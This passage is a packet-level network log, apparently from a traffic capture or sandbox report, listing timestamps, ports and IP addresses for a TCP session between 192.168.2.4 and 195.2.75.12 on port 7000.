May 26, 2024 01:21:24.369149923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369157076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.369190931 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.369817972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369834900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369849920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.369890928 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.369921923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.371804953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.371908903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.371968985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.372140884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.372158051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.372221947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.372625113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.372641087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.372657061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.372670889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.372695923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.372728109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.374711037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374727011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374742031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374756098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374769926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374784946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374790907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.374799967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374814987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374830008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.374830961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.374852896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.374882936 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.375073910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.375153065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.375329018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.375344992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.375360012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.375375032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.375411987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.375444889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.376100063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.376115084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.376198053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.376739025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.376867056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377057076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377130032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.377291918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377309084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377326012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377351999 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.377388954 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.377957106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377974033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.377989054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.378005028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.378029108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.378062963 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.378587008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.378602982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.378618956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.378658056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.379132032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.379148006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.379203081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.381572962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.381587982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.381757975 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.381795883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.381937981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.381998062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.382074118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.382267952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.382283926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.382298946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.382344007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.382394075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.386404991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.386593103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.443924904 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.443985939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.444195986 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.444288969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.444426060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.444614887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.444780111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.445050001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.445182085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.445209980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.445497036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.445662975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.445678949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.445718050 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.445749998 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.446259022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.446337938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.446393013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.446590900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.446964025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.447108030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.447164059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.447294950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.447345018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.447701931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.447803974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.448473930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.448491096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.448534012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.448570013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.448611975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.448724031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.448779106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.448901892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.449214935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.449322939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.449373960 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.449949026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.449999094 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.450057983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.450215101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.450726032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.450778961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.450809002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.450860977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.450972080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.451431036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.451447964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.451499939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.451554060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.451603889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.452229023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.452291012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.452703953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.452759981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.452805996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.452857971 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.452977896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.453433990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.453555107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.453613997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.453711987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.453727007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.453764915 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.454189062 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.454652071 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.461699009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.473392010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.473598003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.473676920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.473875999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.473891973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.473959923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.473959923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.473961115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.474312067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.474472046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.474667072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.474683046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.474756002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.474756002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.475085974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.475253105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.475439072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.475467920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.475994110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.476010084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.476074934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.476093054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.476155043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.476313114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.476330042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.476591110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.476701021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.476924896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477139950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477155924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477191925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.477230072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.477541924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477745056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477760077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477802038 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.477937937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.477996111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.478281975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.478411913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.478630066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.478643894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.478686094 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.478725910 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.478984118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.479074955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.479132891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.479222059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.479394913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.479861975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.479917049 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.479965925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480017900 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.480200052 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480216026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480268955 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.480662107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480760098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480776072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480813026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.480880022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.480937958 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.481508017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.481575966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.481633902 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.483828068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.484090090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.484142065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.484199047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.484746933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.484822035 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.484853983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.485443115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.485500097 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.485543013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.485908985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.485966921 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.486016989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.486742020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.486757994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.486809969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.486845016 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.486881018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.486994982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.487451077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.487504959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.487545967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.487843990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.487901926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.487946033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.487962008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.488020897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.488558054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.488663912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.488806009 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.488827944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.488955021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.489314079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.489371061 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.489413023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.489465952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.493805885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.493822098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.494072914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.518846035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.519150019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.536114931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.536155939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.536295891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.537930965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.537949085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.537965059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.537982941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538014889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.538111925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.538280010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538297892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538733006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538752079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538768053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538783073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.538856983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.538897991 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.539633036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.539650917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.539666891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.539683104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.539712906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.539792061 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.540340900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.540357113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.540426970 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.541224957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541250944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541264057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541275978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541286945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541299105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541311026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541325092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541337013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541373014 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.541404009 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.541727066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541834116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.541979074 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.541980982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.542046070 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.542764902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.542783022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.542809010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.542922020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.543059111 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.543076038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.543135881 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.543775082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.543802977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.543843985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.543941975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.543961048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.543991089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.544770002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.544830084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.547444105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.547470093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.547575951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.564929008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565018892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565058947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565149069 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.565421104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565485001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565521955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565637112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.565674067 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.565675020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.566236973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.566340923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.566348076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.566581011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.566616058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.566678047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.567174911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.567286968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.567303896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.567485094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.567521095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.567542076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.568140030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.568222046 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.568253040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.568450928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.568487883 CEST	7000	49730	195.2.75.12	192.168.2.4
